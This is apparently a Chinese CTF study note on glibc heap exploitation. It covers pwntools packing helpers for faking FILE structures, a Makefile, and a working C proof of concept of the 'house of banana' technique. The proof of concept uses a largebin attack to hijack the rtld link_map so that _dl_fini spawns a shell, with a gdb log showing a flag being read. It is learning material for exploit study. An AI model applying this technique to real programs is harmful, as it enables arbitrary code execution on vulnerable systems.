1 2	fileStr = FileStructure(0xdeadbeef) >>> payload = fileStr.write(addr=0xcafebabe, size=100)

packing，因为我们需要伪造file结构体，因此我们可以使用如下函数

# 根据 context.arch打包， 类似 p32，p64 函数
flat([
	  con1,
	  con2
])

# offset: con, 类似于 cyclic(offset) + p64(con)
flat({
	0xe0: 100
})

# 相对偏移
>>> flat({0xe0:{0x0: 100, 0x10: 200}})

# 同时可以指定填充内容 和 总长度，因为我们伪造结构体需要满足一定条件
flat({0xe0:0x100}, filler=b"\x00", length=0x200)

# 用法和flat({}) 一样 官方文档是 alias of flat
fit({})

测试

最好手动调试一下 largebin attack 和 house_of_banana。

house of banana

参考一下 house_of_banana源码分析这一篇文章的demo

注意改rtld相关指针和libc的偏移大小

makefile

CC := gcc
CFLAFS := -g 

all: house_of_banana large_bin_attack
default: house_of_banana  large_bin_attack

TARGET := house_of_banana  large_bin_attack

house_of_banana: house_of_banana.c 
	$(CC) $(CFLAFS) $^ -o $@

large_bin_attack: large_bin_attack.c 
	$(CC) $(CFLAFS) $^ -o $@

clean:
	rm -f $(TARGET)

house of banana

伪造结构体 l_next 为 0
l_init_called 一个比较神奇的数字，具体的libc打印
ubuntu 22.04 LTS 测试一下，在gdb 下可以执行一个命令就会崩溃。
高版本libc 没有patch进行测试，但是根据源码可行（理论上）

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void shell() { 
  execve("/bin/sh", NULL, NULL);
}
uint64_t get_libc_base() {
  uint64_t to;
  uint64_t from;
  char buf[0x400];

  FILE *file;
  file = fopen("/proc/self/maps", "r");
  while (fgets(buf, sizeof(buf), file)) {
    // printf("%s\n", buf);
    if (strstr(buf, "libc.so.6") != NULL) {
      sscanf(buf, "%lx-%lx", &from, &to);
      fclose(file);
      printf("libc => %#lx-%#lx\n", from, to);
      // getchar();
      return from;
    }
  }
}

int main() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  uint64_t libc_base = get_libc_base();
  uint64_t rtld_global = libc_base + 0x3fd040;
  // &_rtld_global &(_rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next)
  uint64_t *next_node = (uint64_t *)(rtld_global - 0x41ec8);
  uint64_t *p1 = malloc(0x428);
  uint64_t *g1 = malloc(0x18);

  uint64_t *p2 = malloc(0x418);
  uint64_t *g2 = malloc(0x18);

  free(p1);
  uint64_t *g3 = malloc(0x438);  // force p1 insert in to the largebin
  free(p2);
  p1[3] = ((uint64_t)next_node - 0x20);  // push p2 into unsoteded bin
  uint64_t *g4 = malloc(0x438);          // force p2 insert in to the largebin

  // 类似一个 uaf 修改
  uint64_t fake = (uint64_t)p2 - 0x10;  // chunk_header
  *(uint64_t *)(fake + 0x28) = fake;
  *(uint64_t *)(fake + 0x31c) = 0x4011d;
  *(uint64_t *)(fake + 0x110) = fake + 0x40;
  *(uint64_t *)(fake + 0x48) = fake + 0x58;
  *(uint64_t *)(fake + 0x58) = (uint64_t)shell;
  *(uint64_t *)(fake + 0x120) = fake + 0x48;
  *(uint64_t *)(fake + 0x50) = 0x8;

  // 修改 _rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next 的地址为 p2
  // 最后一个linkmap链表遍历 p2
  // 建议 p *(struct link_map *) p2_addr 看一下

  // 问题：assert i < nloaded 错误，因此要将 (struct linkmap *p2) ->l_next 置为0
  p2[1] = 0;

  // l_init_called 为0
  // *(uint64_t*)(fake+0x31c) = 0x4011d; 像是一个magic number
  // 必须为其余类型的值，因此打印出来替换

  // 最后的程序崩溃了😥.

  /*
    0x7ffff7fc9242 <_dl_fini+514>    nop    word ptr [rax + rax]
    0x7ffff7fc9248 <_dl_fini+520>    mov    qword ptr [rbp - 0x38], rax
  ► 0x7ffff7fc924c <_dl_fini+524>    call   qword ptr [rax] <shell>

  pwndbg> bt
    #0  0x000055555555529b in shell () at house_of_banana.c:7
    #1  0x00007ffff7fc924e in _dl_fini () at ./elf/dl-fini.c:142
    #2  0x00007ffff7c45495 in __run_exit_handlers (status=0,
    # ...
  */

  // 但是发现在gdb 调试情况下可以执行一次命令就会崩溃

/*
pwndbg> c
Continuing.
process 6591 is executing new program: /usr/bin/dash
Error in re-setting breakpoint 2: Function "shell" not defined.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
$ cat flag.txt
[Attaching after Thread 0x7ffff7fa7740 (LWP 6591) vfork to child process 6594]
[New inferior 2 (process 6594)]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Detaching vfork parent process 6591 after child exec]
[Inferior 1 (process 6591) detached]
process 6594 is executing new program: /usr/bin/cat
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
flag{house_of_banana_is_good}
[Inferior 2 (process 6594) exited normally]
$ [5]  + 6580 suspended (tty output)  gdb house_of_banana
*/

  return 0;
}